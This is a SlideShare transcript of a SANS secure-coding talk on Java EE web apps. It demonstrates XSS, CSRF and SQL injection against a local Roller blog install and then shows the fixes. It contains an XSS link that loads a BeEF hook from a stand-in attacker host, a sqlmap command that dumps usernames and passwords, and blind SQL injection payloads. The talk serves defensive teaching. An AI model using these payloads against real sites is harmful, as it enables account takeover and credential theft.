Your SlideShare is downloading. ×
0
Securing Java EE Web Apps <ul><li>Frank Kim </li></ul><ul><li>Principal, ThinkSec </li></ul><ul><li>Author, SANS Institute...
About <ul><li>Frank Kim </li></ul><ul><ul><li>Consultant, ThinkSec </li></ul></ul><ul><ul><li>Author, SANS Secure Coding i...
What You Should Know <ul><li>Hacking is not hard </li></ul><ul><li>Don’t trust any data </li></ul><ul><ul><li>Assume that ...
Outline <ul><li>Web App Attack Refresher </li></ul><ul><ul><li>XSS, CSRF, SQL Injection </li></ul></ul><ul><li>Testing </l...
Cross-Site Scripting (XSS) <ul><li>Occurs when unvalidated data is displayed back to the browser </li></ul><ul><li>Types o...
Cross-Site Request Forgery (CSRF)
SQL Injection (SQLi) <ul><li>Occurs when dynamic SQL queries are used </li></ul><ul><ul><li>By injecting arbitrary SQL com...
Outline <ul><li>Web App Attack Refresher </li></ul><ul><ul><li>XSS, CSRF, SQL Injection </li></ul></ul><ul><li>Testing </l...
What are We Testing? <ul><li>Installation of Roller 3.0 </li></ul><ul><li>Fake install of SANS AppSec Street Fighter Blog ...
Attack Scenario <ul><li>XSS to control the victim's browser </li></ul><ul><li>Combine XSS and CSRF to conduct a privilege ...
Spot the Vuln - XSS
XSS in  head.jsp
Testing the &quot;look&quot; Param <ul><li>Admin pages include  head.jsp </li></ul><ul><li>The param is persistent for the...
XSS Exploitation <ul><li>Introducing BeEF </li></ul><ul><ul><li>Browser Exploitation Framework </li></ul></ul><ul><ul><li>...
XSS Exploitation Overview Victim 1) Sends link with evil BeEF script http://localhost:8080/roller/roller-ui/yourWebsites.d...
BeEF XSS Demo
Spot the Vuln - CSRF
CSRF in  UserAdmin.jsp Want to use CSRF to change this field
CSRF Demo
Spot the Vuln – SQL Injection
SQL Injection in  UserServlet
SQL Injection Testing <ul><li>UserServlet  is vulnerable to SQLi </li></ul><ul><ul><li>http://localhost:8080/roller/roller...
Exploiting SQL Injection <ul><li>Introducing sqlmap </li></ul><ul><ul><li>http://sqlmap.sourceforge.net </li></ul></ul><ul...
sqlmap Syntax <ul><li>   Dump userids and passwords </li></ul><ul><ul><li>python sqlmap.py  </li></ul></ul><ul><ul><li>-u...
SQL Injection Demo
How it Works <ul><li>f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMI...
Step By Step [0] <ul><li>SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser  LIMIT 2, 1 ; </l...
Step By Step [1] <ul><li>select  MID ((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIM...
Step By Step [2] <ul><li>select  ORD (MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser...
Attack Summary <ul><li>XSS to control the victim's browser </li></ul><ul><li>Combine XSS and CSRF to conduct a privilege e...
Outline <ul><li>Web App Attack Refresher </li></ul><ul><ul><li>XSS, CSRF, SQL Injection </li></ul></ul><ul><li>Testing </l...
Data Validation Application Should I be consuming this? Should I be emitting this? Inbound Data Outbound Data Data Store V...
Output Encoding <ul><li>Encoding </li></ul><ul><ul><li>Convert characters so they are treated as data and not special char...
Fix XSS in  head.jsp <ul><li>Add URL encoding </li></ul><ul><li><link rel=&quot;stylesheet&quot; type=&quot;text/css&quot;...
Fix CSRF <ul><li>UserAdmin.jsp </li></ul><ul><ul><li>Add anti-CSRF token </li></ul></ul><ul><li><input type=&quot;hidden&q...
Fix SQL Injection <ul><li>Use parameterized queries correctly </li></ul><ul><li>if (startsWith == null || startsWith.equal...
Building Secure Software Source: Microsoft SDL
Remember <ul><li>Hacking is not hard </li></ul><ul><li>Don’t trust any data </li></ul><ul><ul><li>Validate input </li></ul...
SANS Software Security <ul><li>SANS AppSec 2012 </li></ul><ul><ul><li>- April 30 - May 1 in Las Vegas </li></ul></ul><ul><...
Thanks! <ul><li>Frank Kim </li></ul><ul><li>[email_address]     @sansappsec </li></ul>
Upcoming SlideShare
Loading in...5
×

Securing Java EE Web Apps

4,790

Published on

Published in: Technology
0 Comments
8 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
4,790
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
110
Comments
0
Likes
8
Embeds 0
No embeds

No notes for slide
  • 2 -
  • 2 -
  • 2 -
  • 2 -
  • 2 -
  • 2 -
  • 2 -
  • 2 -
  • 2 -
  • 2 -
  • 2 -
  • 2 -
  • 2 -
  • 2 -
  • This slide deck is for presentations only. This slide deck is for presentations only.
  • 2 -
  • 2 -
  • SANS has a number of free resources that you can access to learn about application and software security. The SANS Software Security web site has free white papers, webcasts, and other information as well as the associated AppSec Street Fighter blog. You can also follow us on Twitter for the latest news, information, and discounts on upcoming events. SANS has various courses on web application security, secure coding, and penetration testing where you can learn the skills required to create more secure applications. These courses include the following: DEV522: Web Application Security Essentials is a six-day course where you learn how to create secure web applications that are resistant to attack. DEV541: Secure Coding in Java/JEE is a four-day course that covers secure coding techniques that you can use to build more secure Java/JEE applications. DEV530: Essential Secure Coding in Java/JEE is a two-day course that covers the most essential topics for creating Java web apps. This course is ideal for students who cannot be away from the office for extended periods of time. DEV544: Secure Coding in .NET is a four-day course that covers secure coding techniques that you can use to build more secure .NET applications. DEV532: Essential Secure Coding in ASP.NET is a two-day course that covers the most essential topics for creating APS.NET apps. This course is ideal for students who cannot be away from the office for extended periods of time. DEV542: Web App Pentesting &amp; Ethical Hacking is a six-day course where you learn how to hack web applications.
  • Transcript of "Securing Java EE Web Apps"

    1. 1. Securing Java EE Web Apps <ul><li>Frank Kim </li></ul><ul><li>Principal, ThinkSec </li></ul><ul><li>Author, SANS Institute </li></ul>
    2. 2. About <ul><li>Frank Kim </li></ul><ul><ul><li>Consultant, ThinkSec </li></ul></ul><ul><ul><li>Author, SANS Secure Coding in Java/JEE </li></ul></ul><ul><ul><li>SANS Application Security Curriculum Lead </li></ul></ul>
    3. 3. What You Should Know <ul><li>Hacking is not hard </li></ul><ul><li>Don’t trust any data </li></ul><ul><ul><li>Assume that your users are evil! </li></ul></ul>
    4. 4. Outline <ul><li>Web App Attack Refresher </li></ul><ul><ul><li>XSS, CSRF, SQL Injection </li></ul></ul><ul><li>Testing </li></ul><ul><ul><li>Hacking an open source app </li></ul></ul><ul><li>Secure Coding </li></ul><ul><ul><li>Fixing security bugs </li></ul></ul>
    5. 5. Cross-Site Scripting (XSS) <ul><li>Occurs when unvalidated data is displayed back to the browser </li></ul><ul><li>Types of XSS </li></ul><ul><ul><li>Stored </li></ul></ul><ul><ul><li>Reflected </li></ul></ul><ul><ul><li>Document Object Model (DOM) based </li></ul></ul>
    6. 6. Cross-Site Request Forgery (CSRF)
    7. 7. SQL Injection (SQLi) <ul><li>Occurs when dynamic SQL queries are used </li></ul><ul><ul><li>By injecting arbitrary SQL commands, attackers can extend the meaning of the original query </li></ul></ul><ul><ul><li>Can potentially execute any SQL statement on the database </li></ul></ul><ul><li>Very powerful </li></ul><ul><ul><li>#1 on CWE/SANS Top 25 Most Dangerous Software Errors </li></ul></ul><ul><ul><li>#1 on OWASP Top 10 </li></ul></ul>
    8. 8. Outline <ul><li>Web App Attack Refresher </li></ul><ul><ul><li>XSS, CSRF, SQL Injection </li></ul></ul><ul><li>Testing </li></ul><ul><ul><li>Hacking an open source app </li></ul></ul><ul><li>Secure Coding </li></ul><ul><ul><li>Fixing security bugs </li></ul></ul>
    9. 9. What are We Testing? <ul><li>Installation of Roller 3.0 </li></ul><ul><li>Fake install of SANS AppSec Street Fighter Blog </li></ul><ul><li>Want to simulate the actions that a real attacker might take </li></ul><ul><ul><li>There are definitely other avenues of attack </li></ul></ul><ul><ul><li>We're walking through one attack scenario </li></ul></ul>
    10. 10. Attack Scenario <ul><li>XSS to control the victim's browser </li></ul><ul><li>Combine XSS and CSRF to conduct a privilege escalation attack </li></ul><ul><ul><ul><li>- Use escalated privileges to access another feature </li></ul></ul></ul><ul><li>Use SQL Injection to access the database directly </li></ul>
    11. 11. Spot the Vuln - XSS
    12. 12. XSS in head.jsp
    13. 13. Testing the &quot;look&quot; Param <ul><li>Admin pages include head.jsp </li></ul><ul><li>The param is persistent for the session </li></ul>
    14. 14. XSS Exploitation <ul><li>Introducing BeEF </li></ul><ul><ul><li>Browser Exploitation Framework </li></ul></ul><ul><ul><li>http://www.bindshell.net/tools/beef </li></ul></ul><ul><li>Uses XSS to hook the victim's browser </li></ul><ul><ul><li>Log user keystrokes, view browsing history, execute JavaScript, etc </li></ul></ul><ul><ul><li>Advanced attacks - Metasploit integration, browser exploits, etc </li></ul></ul>
    15. 15. XSS Exploitation Overview Victim 1) Sends link with evil BeEF script http://localhost:8080/roller/roller-ui/yourWebsites.do?look=&quot;><script src=&quot;http://www.attacker.com/beef/hook/beefmagic.js.php&quot;></script> 2) Victim clicks evil link 3) Victim's browser sends data to attacker Attacker
    16. 16. BeEF XSS Demo
    17. 17. Spot the Vuln - CSRF
    18. 18. CSRF in UserAdmin.jsp Want to use CSRF to change this field
    19. 19. CSRF Demo
    20. 20. Spot the Vuln – SQL Injection
    21. 21. SQL Injection in UserServlet
    22. 22. SQL Injection Testing <ul><li>UserServlet is vulnerable to SQLi </li></ul><ul><ul><li>http://localhost:8080/roller/roller-ui/authoring/user </li></ul></ul>No results
    23. 23. Exploiting SQL Injection <ul><li>Introducing sqlmap </li></ul><ul><ul><li>http://sqlmap.sourceforge.net </li></ul></ul><ul><li>Tool that automates detection and exploitation of SQL Injection vulns </li></ul><ul><ul><li>Supports MySQL, Oracle, PostgreSQL, MS SQL Server </li></ul></ul><ul><ul><li>Supports blind, inband, and batch queries </li></ul></ul><ul><ul><li>Fingerprint/enumeration - dump db schemas, tables/column names, data, db users, etc </li></ul></ul><ul><ul><li>Takeover features - read/upload files, exec arbitrary commands, exec Metasploit shellcode, etc </li></ul></ul>
    24. 24. sqlmap Syntax <ul><li> Dump userids and passwords </li></ul><ul><ul><li>python sqlmap.py </li></ul></ul><ul><ul><li>-u &quot;http://localhost:8080/roller/roller-ui/authoring/user?startsWith=f%25&quot; </li></ul></ul><ul><ul><li>--cookie &quot;username=test; JSESSIONID==<INSERT HERE>&quot; </li></ul></ul><ul><ul><li>--drop-set-cookie -p startsWith </li></ul></ul><ul><ul><li>--dump -T rolleruser -C username,passphrase -v 2 </li></ul></ul>
    25. 25. SQL Injection Demo
    26. 26. How it Works <ul><li>f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 103 AND 'neEy' LIKE 'neEy </li></ul><ul><li>f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 104 AND 'neEy' LIKE 'neEy </li></ul><ul><li>f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 105 AND 'neEy' LIKE 'neEy </li></ul>
    27. 27. Step By Step [0] <ul><li>SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1 ; </li></ul><ul><li>returns ilovethetajmahal </li></ul>
    28. 28. Step By Step [1] <ul><li>select MID ((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1 , 1); </li></ul><ul><li>returns i </li></ul><ul><li>select MID ((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2 , 1); </li></ul><ul><li>returns l </li></ul><ul><li>select MID ((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3 , 1); </li></ul><ul><li>returns o </li></ul>
    29. 29. Step By Step [2] <ul><li>select ORD (MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1 , 1)); </li></ul><ul><li>returns 105 </li></ul><ul><li>select ORD (MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2 , 1)); </li></ul><ul><li>returns 108 </li></ul><ul><li>select ORD (MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3 , 1)); </li></ul><ul><li>returns 111 </li></ul>
    30. 30. Attack Summary <ul><li>XSS to control the victim's browser </li></ul><ul><li>Combine XSS and CSRF to conduct a privilege escalation attack </li></ul><ul><ul><ul><li>- Use escalated privileges to access another feature </li></ul></ul></ul><ul><li>Use SQL Injection to access the database directly </li></ul>
    31. 31. Outline <ul><li>Web App Attack Refresher </li></ul><ul><ul><li>XSS, CSRF, SQL Injection </li></ul></ul><ul><li>Testing </li></ul><ul><ul><li>Hacking an open source app </li></ul></ul><ul><li>Secure Coding </li></ul><ul><ul><li>Fixing security bugs </li></ul></ul>
    32. 32. Data Validation Application Should I be consuming this? Should I be emitting this? Inbound Data Outbound Data Data Store Validation Encoding Encoding Validation Outbound Data Inbound Data Validation
    33. 33. Output Encoding <ul><li>Encoding </li></ul><ul><ul><li>Convert characters so they are treated as data and not special characters </li></ul></ul><ul><li>Must escape differently depending where data is displayed on the page </li></ul><ul><li>XSS Prevention Cheat Sheet </li></ul><ul><ul><li>http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet </li></ul></ul>
    34. 34. Fix XSS in head.jsp <ul><li>Add URL encoding </li></ul><ul><li><link rel=&quot;stylesheet&quot; type=&quot;text/css&quot; media=&quot;all&quot; href=&quot;<%= request.getContextPath() %>/roller-ui/theme/<%= ESAPI.encoder().encodeForURL(theme) %>/colors.css&quot; /> </li></ul>
    35. 35. Fix CSRF <ul><li>UserAdmin.jsp </li></ul><ul><ul><li>Add anti-CSRF token </li></ul></ul><ul><li><input type=&quot;hidden&quot; name=<%= CSRFTokenUtil.SESSION_ATTR_KEY %> value=<%= CSRFTokenUtil.getToken(request.getSession(false)) %> > </li></ul><ul><li>UserAdminAction.java </li></ul><ul><ul><li>Check anti-CSRF token </li></ul></ul><ul><li>if (!CSRFTokenUtil.isValid(req.getSession(false), req)){ </li></ul><ul><ul><li>return mapping.findForward(&quot;error&quot;); </li></ul></ul><ul><ul><li>} </li></ul></ul>
    36. 36. Fix SQL Injection <ul><li>Use parameterized queries correctly </li></ul><ul><li>if (startsWith == null || startsWith.equals(&quot;&quot;)) { </li></ul><ul><li>query = &quot;SELECT username, emailaddress FROM rolleruser&quot;; </li></ul><ul><li>stmt = con.prepareStatement(query); </li></ul><ul><li>} else { </li></ul><ul><li>query = &quot;SELECT username, emailaddress FROM rolleruser </li></ul><ul><li>WHERE username like ? or emailaddress like ? &quot;; </li></ul><ul><li>stmt = con.prepareStatement (query); </li></ul><ul><li>stmt.setString (1, startsWith + &quot;%&quot;); </li></ul><ul><li>stmt.setString (2, startsWith + &quot;%&quot;); </li></ul><ul><li>} </li></ul><ul><li>rs = stmt.executeQuery(); </li></ul>
    37. 37. Building Secure Software Source: Microsoft SDL
    38. 38. Remember <ul><li>Hacking is not hard </li></ul><ul><li>Don’t trust any data </li></ul><ul><ul><li>Validate input </li></ul></ul><ul><ul><ul><li>Prefer whitelists </li></ul></ul></ul><ul><ul><ul><li>Use authenticity token </li></ul></ul></ul><ul><ul><li>Encode output </li></ul></ul><ul><ul><ul><li>Contextual encoding </li></ul></ul></ul><ul><ul><ul><li>Use parameterized queries </li></ul></ul></ul>
    39. 39. SANS Software Security <ul><li>SANS AppSec 2012 </li></ul><ul><ul><li>- April 30 - May 1 in Las Vegas </li></ul></ul><ul><ul><li>- CFP is open now! </li></ul></ul><ul><ul><li>- http://sans.org/appsec-2012 </li></ul></ul><ul><li>New courses </li></ul><ul><ul><li>- DEV551 Secure iOS Development </li></ul></ul><ul><ul><li>- DEV568 Secure Android Development </li></ul></ul><ul><li>Free resources </li></ul><ul><ul><li>- Top 25, blog, white papers, webcasts, and more at </li></ul></ul><ul><ul><li>- http://software-security.sans.org </li></ul></ul><ul><li>Discount </li></ul><ul><ul><li>- Save 10% using the discount code DEVOXX. Enterprise pricing avail. </li></ul></ul>
    40. 40. Thanks! <ul><li>Frank Kim </li></ul><ul><li>[email_address] @sansappsec </li></ul>
    1. A particular slide catching your eye?

      Clipping is a handy way to collect important slides you want to go back to later.

    ×